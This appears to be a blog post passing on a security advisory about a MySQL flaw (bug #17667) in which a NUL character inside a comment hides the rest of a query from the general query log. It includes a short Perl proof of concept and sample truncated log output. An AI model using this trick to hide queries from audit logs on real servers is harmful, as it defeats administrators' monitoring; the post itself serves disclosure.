Security advisory for MySQL: Don't trust your general query log if you don't trust your users
I just stumbled across a recently discovered security issue in MySQL while I made use of the general query log today (which is usually deactivated on our servers) to track down the behaviour of some legacy applications: If you grant access to possibly untrusted users, you shouldn't count on the general query log to supervise their activities.
The original security advisory was published one week ago by 1dt.w0lf and also reported as bug #17667.
A user can hide any queries from the general query log by just embedding a NUL character (ASCII 0). The general query log will treat that as an end of string and skip all following characters. To hide your queries just add a comment including the NUL character to the beginning as in the following proof of concept.
#!/usr/bin/perl
use strict;
use warnings;
use DBI;
my $db = DBI->connect("DBI:mysql:mysql_read_default_group=mysql");
die($DBI::errstr."\n") unless $db;
$db->do("/* This is okay. ".chr(0)." */ SELECT 'This will be hidden from query log'");
$db->disconnect;
This is what affected versions of MySQL (at least all current production releases <= 5.0.18 seem to be vulnerable) will show in the general query log, everything from the NUL character on is stripped:
19321 Connect xxx@localhost on
19321 Query /* This is okay.
19321 Quit
As only the general query log and not the binary log is affected by this security issue, it can certainly be considered less critical. All statements actually manipulating data can be captured within the binary log or with triggers.
